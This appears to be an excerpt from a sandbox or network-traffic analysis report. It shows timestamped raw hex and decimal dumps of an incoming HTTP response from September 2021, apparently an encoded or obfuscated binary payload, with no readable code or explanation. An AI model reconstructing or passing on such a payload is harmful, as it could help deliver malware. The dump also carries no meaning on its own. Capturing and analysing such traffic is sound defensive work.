                                                                                              2021-09-27 18:27:44 UTC1706INData Raw: 20 39 35 20 31 32 36 20 37 35 20 31 31 36 20 39 33 20 39 35 20 35 30 20 35 34 20 39 34 20 38 38 20 38 33 20 37 30 20 31 35 35 20 32 30 20 32 37 20 31 39 33 20 35 34 20 38 34 20 31 31 34 20 31 31 38 20 39 33 20 31 32 32 20 35 30 20 32 33 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 34 33 20 34 33 20 32 37 20 39 34 20 38 34 20 31 34 20 31 31 39 20 31 31 32 20 35 30 20 35 32 20 33 31 20 34 38 20 31 32 37 20 31 31 33 20 38 33 20 37 30 20 31 33 32 20 32 34 20 35 30 20 34 32 20 34 32 20 31 32 31 20 31 32 36 20 38 33 20 32 32 20 31 30 36 20 35 30 20 34 38 20 35 34 20 38 39 20 33 36 20 31 31 34 20 31 31 37 20 31 30 33 20 39 30 20 32 30 20 32 37 20 31 39 32 20 35 34 20 38 37 20 36 36 20 31 32 37 20 31 30 39 20 38 37 20 35
                                                                                              Data Ascii: 95 126 75 116 93 95 50 54 94 88 83 70 155 20 27 193 54 84 114 118 93 122 50 23 50 54 84 114 117 109 112 48 43 43 27 94 84 14 119 112 50 52 31 48 127 113 83 70 132 24 50 42 42 121 126 83 22 106 50 48 54 89 36 114 117 103 90 20 27 192 54 87 66 127 109 87 5
                                                                                              2021-09-27 18:27:44 UTC1707INData Raw: 30 20 38 31 20 39 30 20 31 39 34 20 31 30 39 20 31 31 32 20 35 32 20 32 36 20 35 30 20 35 34 20 38 34 20 31 31 33 20 36 39 20 31 30 33 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 34 36 20 34 33 20 33 31 20 34 39 20 31 31 34 20 39 30 20 32 33 35 20 31 30 39 20 31 31 32 20 35 32 20 32 36 20 32 30 20 32 39 20 31 36 33 20 31 31 34 20 31 31 31 20 36 39 20 32 33 37 20 35 30 20 34 38 20 35 32 20 32 38 20 38 34 20 39 37 20 36 39 20 31 30 35 20 31 31 32 20 31 36 39 20 34 38 20 35 30 20 35 34 20 37 36 20 31 31 34 20 31 31 37 20 31 32 34 20 31 30 35 20 31 39 31 20 31 33 39 20 35 30 20 35 34 20 38 35 20 31 30 38 20 37 39 20 31 38 20 31 31 32 20 35 30 20 34 38 20 32 30 20 34 38 20 36 36 20 31 36 32 20 31
                                                                                              Data Ascii: 0 81 90 194 109 112 52 26 50 54 84 113 69 103 112 61 48 50 54 84 114 117 109 115 46 43 31 49 114 90 235 109 112 52 26 20 29 163 114 111 69 237 50 48 52 28 84 97 69 105 112 169 48 50 54 76 114 117 124 105 191 139 50 54 85 108 79 18 112 50 48 20 48 66 162 1
                                                                                              2021-09-27 18:27:44 UTC1709INData Raw: 39 20 36 39 20 36 30 20 35 30 20 34 38 20 35 36 20 33 39 20 38 30 20 31 32 31 20 39 33 20 31 32 20 31 31 32 20 35 30 20 35 38 20 32 33 36 20 35 34 20 38 33 20 38 38 20 31 30 39 20 31 38 39 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 34 20 38 34 20 31 32 32 20 31 31 37 20 34 30 20 36 31 20 35 30 20 36 33 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 30 32 20 39 33 20 31 31 36 20 35 30 20 39 36 20 35 30 20 35 34 20 38 34 20 31 30 35 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 36 37 20 37 32 20 35 34 20 38 34 20 31 32 30 20 31 31 30 20 36 34 20 31 32 33 20 32 30 20 35 35 20 39 33 20 37 35 20 38 34 20 31 31 34 20 31 32 37 20 36 34 20 31 31 39 20 32 35 20 35 31 20 35 37 20 32 39 20 31 36 37 20 31 30 30 20 39 35 20 31 30 36 20 33 31 20 37 38 20 34 38 20 35
                                                                                              Data Ascii: 9 69 60 50 48 56 39 80 121 93 12 112 50 58 236 54 83 88 109 189 113 34 48 50 54 84 122 117 40 61 50 63 116 54 84 115 102 93 116 50 96 50 54 84 105 117 109 97 48 67 72 54 84 120 110 64 123 20 55 93 75 84 114 127 64 119 25 51 57 29 167 100 95 106 31 78 48 5
                                                                                              2021-09-27 18:27:44 UTC1710INData Raw: 20 32 35 31 20 32 31 38 20 32 36 20 32 36 20 37 31 20 35 30 20 35 34 20 39 34 20 32 37 20 31 30 32 20 31 30 37 20 39 37 20 35 35 20 35 34 20 35 38 20 33 39 20 38 32 20 32 39 20 32 34 37 20 31 30 39 20 31 31 32 20 35 36 20 36 31 20 35 38 20 36 33 20 31 32 20 31 32 36 20 31 32 35 20 31 30 37 20 32 35 34 20 31 33 33 20 33 20 32 33 30 20 33 39 20 38 31 20 32 39 20 31 32 20 31 30 39 20 31 31 32 20 35 36 20 35 34 20 32 34 20 33 37 20 31 30 30 20 31 31 39 20 31 31 37 20 36 39 20 31 31 32 20 35 30 20 34 38 20 34 35 20 35 34 20 38 34 20 39 39 20 31 31 39 20 31 31 36 20 31 30 34 20 36 35 20 37 30 20 35 30 20 35 34 20 39 34 20 31 30 38 20 38 38 20 31 31 39 20 38 36 20 35 32 20 35 32 20 39 33 20 31 38 33 20 38 34 20 31 31 34 20 31 32 37 20 31 30 37 20 31 31 35 20 33
                                                                                              Data Ascii: 251 218 26 26 71 50 54 94 27 102 107 97 55 54 58 39 82 29 247 109 112 56 61 58 63 12 126 125 107 254 133 3 230 39 81 29 12 109 112 56 54 24 37 100 119 117 69 112 50 48 45 54 84 99 119 116 104 65 70 50 54 94 108 88 119 86 52 52 93 183 84 114 127 107 115 3
                                                                                              2021-09-27 18:27:44 UTC1711INData Raw: 39 39 20 32 30 20 32 37 20 31 39 36 20 35 32 20 37 39 20 31 30 30 20 38 39 20 31 30 31 20 38 36 20 39 33 20 39 36 20 35 30 20 35 34 20 38 32 20 38 39 20 31 31 38 20 37 35 20 39 31 20 31 39 36 20 32 36 20 35 30 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 39 31 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 20 32 33 20 34 38 20 35 30 20 35 30 20 31 32 30 20 31 31 35 20 39 35 20 31 31 31 20 31 30 33 20 33 36 20 32 38 20 33 36 20 31 36 20 31 31 34 20 31 31 32 20 31 34 20 37 35 20 31 31 32 20 35 30 20 35 32 20 33 36 20 35 32 20 34 37 20 38 36 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 31 38 33 20 35 30 20 35 34 20 39 34 20 38 34 20 39 35 20 31 36 20 38 35 20 35 30 20 34 38 20 35 34 20 32 39 20 31 37 37
                                                                                              Data Ascii: 99 20 27 196 52 79 100 89 101 86 93 96 50 54 82 89 118 75 91 196 26 50 54 87 66 124 109 91 50 48 50 54 84 114 117 111 11 23 48 50 50 120 115 95 111 103 36 28 36 16 114 112 14 75 112 50 52 36 52 47 86 117 109 116 93 183 50 54 94 84 95 16 85 50 48 54 29 177
                                                                                              2021-09-27 18:27:44 UTC1713INData Raw: 20 35 37 20 32 30 20 34 38 20 31 32 34 20 32 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 35 20 35 31 20 35 36 20 32 39 20 31 36 31 20 31 31 32 20 31 34 20 36 38 20 31 31 32 20 35 30 20 35 32 20 34 39 20 38 39 20 32 31 36 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 32 39 20 35 30 20 37 33 20 33 31 20 38 34 20 31 31 34 20 31 31 33 20 31 31 30 20 33 31 20 31 39 31 20 34 38 20 35 30 20 36 30 20 38 30 20 39 30 20 33 39 20 31 30 39 20 31 31 32 20 35 36 20 39 35 20 39 37 20 35 34 20 38 34 20 31 32 30 20 38 39 20 31 31 31 20 31 37 34 20 31 31 33 20 35 30 20 37 33 20 33 31 20 38 34 20 31 31 34 20 31 31 33 20 31 31 30 20 31 31 36 20 32 36 20 39 38 20 35 30 20 35 34 20 39 34 20 32 39 20 32 35 31 20 31 30 39 20 31 31 32 20 35 36 20 32 33 38 20 34 31 20 35 32
                                                                                              Data Ascii: 57 20 48 124 251 117 109 122 25 51 56 29 161 112 14 68 112 50 52 49 89 216 114 117 103 92 29 50 73 31 84 114 113 110 31 191 48 50 60 80 90 39 109 112 56 95 97 54 84 120 89 111 174 113 50 73 31 84 114 113 110 116 26 98 50 54 94 29 251 109 112 56 238 41 52
                                                                                              2021-09-27 18:27:44 UTC1714INData Raw: 20 32 30 32 20 35 36 20 33 32 20 34 38 20 37 30 20 31 31 35 20 39 33 20 32 35 34 20 31 31 32 20 35 30 20 35 38 20 33 33 20 35 30 20 37 30 20 31 31 38 20 39 33 20 32 34 39 20 31 31 32 20 35 30 20 35 38 20 33 32 20 35 35 20 31 32 34 20 32 32 35 20 31 31 37 20 31 30 39 20 31 32 32 20 33 33 20 35 33 20 33 32 20 35 31 20 31 32 34 20 32 33 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 39 38 20 35 30 20 35 34 20 39 34 20 39 30 20 32 32 37 20 31 30 39 20 31 31 32 20 35 36 20 33 33 20 35 32 20 38 39 20 31 39 35 20 31 31 34 20 31 31 37 20 31 30 33 20 39 38 20 35 31 20 32 34 20 31 37 30 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 37 34 20 31 32 30 20 39 33 20 31 36 39 20 35 30 20 35 34 20 39 34 20 31 32 30 20 31 37 31 20 31 30 36 20 31 32 31 20 32 36 20 31 38
                                                                                              Data Ascii: 202 56 32 48 70 115 93 254 112 50 58 33 50 70 118 93 249 112 50 58 32 55 124 225 117 109 122 33 53 32 51 124 231 117 109 122 26 98 50 54 94 90 227 109 112 56 33 52 89 195 114 117 103 98 51 24 170 54 84 120 88 174 120 93 169 50 54 94 120 171 106 121 26 18
                                                                                              2021-09-27 18:27:44 UTC1715INData Raw: 20 31 31 32 20 35 30 20 35 34 20 32 36 20 38 32 20 38 34 20 31 31 34 20 31 31 35 20 31 39 20 37 31 20 35 30 20 34 38 20 35 34 20 32 36 20 39 34 20 39 30 20 31 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 38 34 20 35 34 20 38 34 20 31 31 36 20 39 33 20 32 34 30 20 31 31 32 20 35 30 20 35 34 20 32 36 20 31 30 35 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 32 35 30 20 35 30 20 34 38 20 35 32 20 32 38 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 36 34 20 35 34 20 34 38 20 37 37 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 32 34 20 31 38 33 20 35 34 20 38 34 20 31 31 36 20 31 31 31 20 36 34 20 30 20 32 30 20 37 38 20 31 31 33 20 35 34 20 38 34 20 31 31 38 20 39 37 20 31 34 37 20 31 31 38 20 31 35 30 20 34 38 20 35 30 20
                                                                                              Data Ascii: 112 50 54 26 82 84 114 115 19 71 50 48 54 26 94 90 18 109 112 52 24 84 54 84 116 93 240 112 50 54 26 105 84 114 115 69 250 50 48 52 28 84 114 117 110 64 54 48 77 54 84 114 117 109 112 50 24 183 54 84 116 111 64 0 20 78 113 54 84 118 97 147 118 150 48 50
                                                                                              2021-09-27 18:27:44 UTC1717INData Raw: 20 31 31 34 20 31 30 30 20 37 37 20 33 34 20 31 38 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 35 20 34 38 20 35 30 20 34 38 20 34 32 20 36 34 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 31 36 32 20 35 30 20 35 34 20 39 34 20 31 30 36 20 38 38 20 31 31 30 20 38 36 20 32 35 20 31 30 20 35 37 20 32 39 20 31 37 35 20 39 36 20 31 31 36 20 36 39 20 32 32 37 20 35 30 20 34 38 20 35 36 20 34 34 20 31 32 31 20 38 38 20 38 33 20 37 37 20 32 20 31 38 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 39 38 20 35 30 20 32 34 20 31 36 36 20 35 34 20 38 34 20 31 32 30 20 31 30 33 20 31 30 39 20 38 38 20 31 36 37 20 34 38 20 35 30 20 36 30 20 31 32 34 20 33 32 20 31 31 37 20 31 30 39
                                                                                              Data Ascii: 114 100 77 34 18 224 44 30 171 114 117 107 88 135 48 50 48 42 64 117 109 116 93 162 50 54 94 106 88 110 86 25 10 57 29 175 96 116 69 227 50 48 56 44 121 88 83 77 2 18 224 44 30 171 114 117 107 98 50 24 166 54 84 120 103 109 88 167 48 50 60 124 32 117 109
                                                                                              2021-09-27 18:27:44 UTC1718INData Raw: 31 37 20 31 30 33 20 31 37 32 20 32 33 36 20 31 36 20 32 33 20 33 30 20 32 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 39 20 35 33 20 33 33 20 35 33 20 32 32 20 36 34 20 38 32 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 38 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 38 31 20 35 30 20 35 34 20 39 34 20 31 37 32 20 31 31 37 20 37 31 20 31 30 33 20 33 37 20 34 39 20 32 36 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 39 20 31 31 32 20 31 31 32 20 32 34 30 20 35 30 20 35 36 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 35 30 20 32 35 34 20 35 30 20 32 39 20 31 37 33 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 31 31 34 20 31 31 34 20 31 35 30 20 31
                                                                                              Data Ascii: 17 103 172 236 16 23 30 24 114 117 103 99 53 33 53 22 64 82 165 115 88 205 48 50 48 124 198 117 109 118 26 81 50 54 94 172 117 71 103 37 49 26 54 84 112 117 19 112 112 240 50 56 84 114 117 109 114 50 254 50 29 173 114 123 109 112 50 48 50 54 114 114 150 1
                                                                                              2021-09-27 18:27:44 UTC1719INData Raw: 37 38 20 30 20 38 34 20 31 31 34 20 31 31 33 20 31 31 37 20 31 32 31 20 31 38 38 20 31 33 35 20 33 37 20 31 31 31 20 37 31 20 31 31 37 20 31 30 32 20 31 30 35 20 37 32 20 32 31 36 20 34 38 20 35 30 20 35 34 20 37 30 20 31 31 39 20 31 33 39 20 31 32 30 20 39 36 20 35 30 20 34 38 20 34 38 20 33 36 20 38 31 20 31 32 33 20 31 30 30 20 31 30 35 20 32 33 34 20 37 35 20 31 32 30 20 35 30 20 35 34 20 38 35 20 33 20 36 31 20 31 30 39 20 31 31 32 20 35 31 20 37 37 20 34 35 20 35 34 20 38 34 20 31 31 38 20 31 30 33 20 31 30 34 20 31 32 31 20 33 35 20 35 32 20 33 37 20 31 31 30 20 32 30 36 20 31 31 20 37 31 20 31 30 39 20 31 31 32 20 35 31 20 36 35 20 30 20 35 34 20 38 34 20 31 31 35 20 38 20 31 31 35 20 31 31 32 20 35 30 20 35 32 20 33 32 20 35 31 20 39 33 20 39 39
                                                                                              Data Ascii: 78 0 84 114 113 117 121 188 135 37 111 71 117 102 105 72 216 48 50 54 70 119 139 120 96 50 48 48 36 81 123 100 105 234 75 120 50 54 85 3 61 109 112 51 77 45 54 84 118 103 104 121 35 52 37 110 206 11 71 109 112 51 65 0 54 84 115 8 115 112 50 52 32 51 93 99
                                                                                              2021-09-27 18:27:44 UTC1721INData Raw: 31 32 37 20 31 34 36 20 31 31 20 38 37 20 31 31 32 20 35 30 20 35 32 20 39 33 20 31 30 34 20 38 34 20 31 31 34 20 31 32 37 20 31 32 33 20 39 32 20 34 39 20 32 32 20 32 35 20 31 30 32 20 37 31 20 31 31 39 20 39 34 20 31 35 31 20 39 38 20 35 35 20 32 34 20 31 30 39 20 35 34 20 38 34 20 31 32 30 20 31 32 30 20 31 30 30 20 31 31 20 33 32 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 32 20 39 34 20 38 37 20 31 32 30 20 35 39 20 37 35 20 33 35 20 35 34 20 38 34 20 31 31 38 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 31 30 31 20 31 32 31 20 37 33 20 36 33 20 35 30 20 35 34 20 38 30 20 32 35 34 20 37 31 20 31 30 39 20 31 31 32 20 35 31 20 39 35 20 31 30 35 20 35 34 20 38 34 20 31 32 30 20 31 32 35
                                                                                              Data Ascii: 127 146 11 87 112 50 52 93 104 84 114 127 123 92 49 22 25 102 71 119 94 151 98 55 24 109 54 84 120 120 100 11 32 48 50 50 121 112 94 87 120 59 75 35 54 84 118 249 37 112 50 49 93 109 84 114 127 101 121 73 63 50 54 80 254 71 109 112 51 95 105 54 84 120 125
                                                                                              2021-09-27 18:27:44 UTC1722INData Raw: 20 35 35 20 36 38 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 36 31 20 34 38 20 31 39 31 20 31 37 30 20 38 34 20 31 32 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 35 31 20 32 20 35 30 20 38 34 20 31 38 39 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 34 32 20 35 33 20 31 31 37 20 31 30 39 20 31 31 36 20 33 30 20 34 39 20 32 34 20 33 33 20 36 35 20 37 32 20 32 31 35 20 31 30 39 20 31 31 32 20 35 30 20 32 32 20 36 35 20 32 34 36 20 38 34 20 31 31 34 20 31 32 37 20 31 31 38 20 37 34 20 31 34 36 20 34 38 20 35 30 20 35 34 20 31 31 34 20 31 20 31 39 20 31 30 39 20 31 31 32 20 35 36 20 34 30 20 38 20 31 36 38 20 38 34 20 31 31 34 20 31 31 37 20 37 35 20 31 30 30 20 32 30 34 20 35 34 20 31 34 36 20 35 34 20 38 34 20 31
                                                                                              Data Ascii: 55 68 114 117 111 112 61 48 191 170 84 124 117 109 112 50 51 2 50 84 189 117 109 112 50 48 50 54 42 53 117 109 116 30 49 24 33 65 72 215 109 112 50 22 65 246 84 114 127 118 74 146 48 50 54 114 1 19 109 112 56 40 8 168 84 114 117 75 100 204 54 146 54 84 1
                                                                                              2021-09-27 18:27:44 UTC1723INData Raw: 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 31 34 20 37 39 20 34 38 20 35 30 20 35 30 20 35 39 20 34 32 20 31 31 37 20 31 30 39 20 31 31 38 20 37 36 20 31 31 20 35 30 20 35 34 20 38 30 20 38 32 20 31 31 32 20 37 36 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 31 31 20 31 38 20 31 31 32 20 35 30 20 35 32 20 39 33 20 31 31 30 20 38 34 20 31 31 34 20 31 31 35 20 31 39 20 37 35 20 35 30 20 34 38 20 35 34 20 32 32 20 31 30 34 20 38 33 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 34 32 20 32 34 32 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 31 30 34 20 35 30 20 35 34 20 38 32 20 31 32 20 37 38 20 31 30 39 20 31 31 32 20 35 34 20 31 36 20 32 33 35 20 32 30 20 31
                                                                                              Data Ascii: 224 44 30 171 114 117 107 14 79 48 50 50 59 42 117 109 118 76 11 50 54 80 82 112 76 160 44 24 205 54 84 116 11 18 112 50 52 93 110 84 114 115 19 75 50 48 54 22 104 83 165 115 88 205 48 50 48 42 242 117 109 116 93 104 50 54 82 12 78 109 112 54 16 235 20 1
                                                                                              2021-09-27 18:27:44 UTC1725INData Raw: 20 35 38 20 34 33 20 31 32 20 31 33 33 20 31 31 34 20 31 31 37 20 31 30 39 20 38 36 20 33 35 20 35 33 20 36 35 20 32 35 34 20 38 34 20 31 31 34 20 31 32 37 20 31 31 33 20 37 34 20 32 34 38 20 34 38 20 35 30 20 35 34 20 31 31 34 20 39 39 20 31 31 33 20 31 32 34 20 31 31 36 20 39 33 20 32 34 39 20 35 30 20 35 34 20 39 34 20 32 39 20 31 39 31 20 31 30 39 20 31 31 32 20 35 36 20 36 31 20 32 36 20 32 35 33 20 38 34 20 31 31 34 20 31 32 37 20 36 39 20 30 20 35 30 20 34 38 20 35 32 20 35 38 20 39 33 20 31 32 32 20 39 33 20 32 38 20 31 31 32 20 35 30 20 35 34 20 31 37 38 20 31 31 35 20 38 34 20 31 31 34 20 31 31 33 20 31 39 20 35 33 20 35 30 20 34 38 20 35 34 20 33 30 20 31 32 35 20 31 31 35 20 31 31 37 20 31 30 37 20 39 37 20 35 34 20 33 33 20 35 34 20 38 39 20
                                                                                              Data Ascii: 58 43 12 133 114 117 109 86 35 53 65 254 84 114 127 113 74 248 48 50 54 114 99 113 124 116 93 249 50 54 94 29 191 109 112 56 61 26 253 84 114 127 69 0 50 48 52 58 93 122 93 28 112 50 54 178 115 84 114 113 19 53 50 48 54 30 125 115 117 107 97 54 33 54 89
                                                                                              2021-09-27 18:27:44 UTC1726INData Raw: 35 30 20 35 30 20 31 32 34 20 31 38 20 31 31 36 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 34 36 20 31 36 20 37 36 20 31 31 32 20 32 35 31 20 32 31 38 20 31 30 33 20 31 30 37 20 36 30 20 35 36 20 31 34 20 31 39 38 20 31 31 34 20 31 31 37 20 31 30 39 20 32 34 30 20 31 30 20 34 38 20 35 30 20 35 30 20 31 32 37 20 31 36 30 20 32 34 35 20 39 30 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 32 35 20 32 31 32 20 36 38 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 33 38 20 33 32 20 35 35 20 31 37 30 20 31 30 33 20 31 30 31 20 31 30 39 20 31 31 32 20 34 38 20 33 34 20 35 31 20 35 32 20 38 32 20 32 33 32 20 31 32 20 33 37 20 31 31 32 20 35 30 20 34 39 20 36 37 20 31 32 36 20 38 34 20 31 31 34 20 31 31 36 20 31 36 20 31 31 31 20 35 30 20 34 38 20 35 34 20 33
                                                                                              Data Ascii: 50 50 124 18 116 109 118 43 29 46 16 76 112 251 218 103 107 60 56 14 198 114 117 109 240 10 48 50 50 127 160 245 90 112 50 52 25 225 212 68 117 109 116 25 238 32 55 170 103 101 109 112 48 34 51 52 82 232 12 37 112 50 49 67 126 84 114 116 16 111 50 48 54 3
                                                                                              2021-09-27 18:27:44 UTC1727INData Raw: 20 34 33 20 34 35 20 33 31 20 35 31 20 31 31 34 20 38 38 20 38 33 20 37 30 20 31 36 35 20 32 30 20 32 37 20 32 30 33 20 35 34 20 38 34 20 39 37 20 36 39 20 31 30 34 20 31 31 32 20 31 30 32 20 34 38 20 35 30 20 35 34 20 31 30 33 20 31 31 34 20 31 31 37 20 31 32 34 20 31 32 37 20 35 31 20 32 34 20 32 32 35 20 35 34 20 38 34 20 31 32 30 20 31 32 32 20 31 30 38 20 38 38 20 32 32 35 20 34 38 20 35 30 20 36 30 20 37 34 20 31 20 31 36 31 20 31 30 39 20 31 31 32 20 35 36 20 34 30 20 33 31 20 31 20 31 31 34 20 31 20 31 36 30 20 31 30 39 20 31 31 32 20 35 36 20 34 35 20 33 31 20 37 20 31 31 34 20 31 31 36 20 31 32 35 20 31 31 34 20 39 36 20 39 33 20 32 33 30 20 35 30 20 35 34 20 39 34 20 32 39 20 31 36 32 20 31 30 39 20 31 31 32 20 35 36 20 35 34 20 35 38 20 34 31
                                                                                              Data Ascii: 43 45 31 51 114 88 83 70 165 20 27 203 54 84 97 69 104 112 102 48 50 54 103 114 117 124 127 51 24 225 54 84 120 122 108 88 225 48 50 60 74 1 161 109 112 56 40 31 1 114 1 160 109 112 56 45 31 7 114 116 125 114 96 93 230 50 54 94 29 162 109 112 56 54 58 41
                                                                                              2021-09-27 18:27:44 UTC1729INData Raw: 31 38 32 20 34 38 20 35 30 20 34 38 20 31 32 36 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 36 36 20 34 38 20 35 30 20 35 34 20 39 38 20 31 31 34 20 31 31 37 20 31 32 34 20 38 38 20 31 30 20 34 39 20 35 30 20 34 38 20 31 32 31 20 31 31 35 20 39 35 20 31 39 20 31 31 20 35 30 20 34 38 20 35 34 20 32 37 20 35 32 20 39 30 20 31 37 30 20 31 30 39 20 31 31 32 20 35 36 20 36 37 20 32 31 30 20 35 34 20 38 34 20 31 32 30 20 31 30 39 20 36 34 20 31 31 30 20 32 30 20 35 34 20 32 36 20 32 31 35 20 38 34 20 31 31 34 20 31 32 37 20 32 20 31 34 36 20 35 30 20 34 38 20 35 36 20 34 38 20 31 31 36 20 31 30 34 20 38 37 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 32 39 20 31 35 30 20 31 30 39 20 31 31 32 20 35 36 20 32 37 20 34 39 20 36 30
                                                                                              Data Ascii: 182 48 50 48 126 105 69 110 112 66 48 50 54 98 114 117 124 88 10 49 50 48 121 115 95 19 11 50 48 54 27 52 90 170 109 112 56 67 210 54 84 120 109 64 110 20 54 26 215 84 114 127 2 146 50 48 56 48 116 104 87 189 110 26 207 50 54 82 29 150 109 112 56 27 49 60
                                                                                              2021-09-27 18:27:44 UTC1730INData Raw: 38 32 20 35 34 20 38 34 20 31 31 34 20 31 31 34 20 37 37 20 31 36 33 20 31 37 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 31 31 38 20 39 33 20 32 31 36 20 35 30 20 35 34 20 39 34 20 31 32 37 20 31 31 20 31 38 20 31 31 32 20 35 30 20 35 32 20 31 38 20 32 35 35 20 31 31 39 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 31 38 39 20 31 31 34 20 31 31 37 20 31 30 33 20 31 32 31 20 31 38 20 33 32 20 32 31 20 35 34 20 38 34 20 39 30 20 32 34 38 20 31 30 39 20 31 31 32 20 35 32 20 32 32 20 32 35 20 31 30 32 20 34 32 20 31 33 20 31 31 37 20 31 30 39 20 31 31 36 20 33 33 20 35 32 20 32 36 20 32 33 33 20 38 34 20 31 31 34 20 31 32 37 20 31 30 37 20 31 30 35 20 32 36 20 32 31 35 20 35 30 20 35
                                                                                              Data Ascii: 82 54 84 114 114 77 163 17 224 44 30 171 114 117 107 118 93 216 50 54 94 127 11 18 112 50 52 18 255 119 162 107 69 143 50 48 52 30 189 114 117 103 121 18 32 21 54 84 90 248 109 112 52 22 25 102 42 13 117 109 116 33 52 26 233 84 114 127 107 105 26 215 50 5
                                                                                              2021-09-27 18:27:44 UTC1731INData Raw: 31 30 39 20 39 39 20 32 20 35 31 20 35 30 20 31 32 20 38 34 20 31 31 34 20 31 31 37 20 38 37 20 31 31 32 20 35 30 20 33 33 20 31 38 20 31 34 37 20 31 31 39 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 32 32 20 33 31 20 38 31 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 31 32 34 20 33 39 20 31 31 36 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 35 37 20 31 36 20 38 33 20 39 30 20 30 20 31 30 39 20 31 31 32 20 35 36 20 32 38 20 35 37 20 32 39 20 38 37 20 31 32 31 20 39 34 20 31 35 38 20 31 34 20 31 39 33 20 34 38 20 35 30 20 36 30 20 31 32 36 20 39 36 20 31 31 39 20 31 30 36 20 38 38 20 32 32 34 20 34 38 20 35 30 20 36 30 20 39 32 20 38 38 20 31 31 37 20 31 30 39 20 31 30 37 20 32 20 35 31 20 35 30
                                                                                              Data Ascii: 109 99 2 51 50 12 84 114 117 87 112 50 33 18 147 119 162 107 69 143 50 48 52 22 31 81 165 115 88 205 48 50 48 124 39 116 109 118 43 29 57 16 83 90 0 109 112 56 28 57 29 87 121 94 158 14 193 48 50 60 126 96 119 106 88 224 48 50 60 92 88 117 109 107 2 51 50
                                                                                              2021-09-27 18:27:44 UTC1733INData Raw: 35 20 31 32 36 20 37 35 20 31 32 30 20 32 36 20 31 35 38 20 35 30 20 35 34 20 39 34 20 39 34 20 31 32 32 20 37 30 20 31 31 35 20 36 32 20 32 37 20 31 39 33 20 36 32 20 37 32 20 39 35 20 31 31 38 20 37 35 20 31 37 34 20 32 33 20 35 38 20 32 35 20 32 30 35 20 31 33 38 20 31 30 38 20 38 30 20 36 39 20 36 30 20 35 30 20 34 38 20 35 36 20 35 39 20 39 33 20 38 32 20 31 38 30 20 37 33 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 39 33 20 32 31 37 20 31 31 32 20 35 30 20 35 34 20 32 36 20 38 37 20 38 34 20 31 31 34 20 31 32 37 20 31 37 39 20 31 31 32 20 33 38 20 32 36 20 35 32 20 32 38 20 38 35 20 39 38 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 32 33 20 35 30 20 32 31 20 33 30 20 31 31 34 20 31 30 37 20 34 33 20 31 31 32 20 35
                                                                                              Data Ascii: 5 126 75 120 26 158 50 54 94 94 122 70 115 62 27 193 62 72 95 118 75 174 23 58 25 205 138 108 80 69 60 50 48 56 59 93 82 180 73 160 44 24 205 54 84 116 93 217 112 50 54 26 87 84 114 127 179 112 38 26 52 28 85 98 117 109 112 50 23 50 21 30 114 107 43 112 5
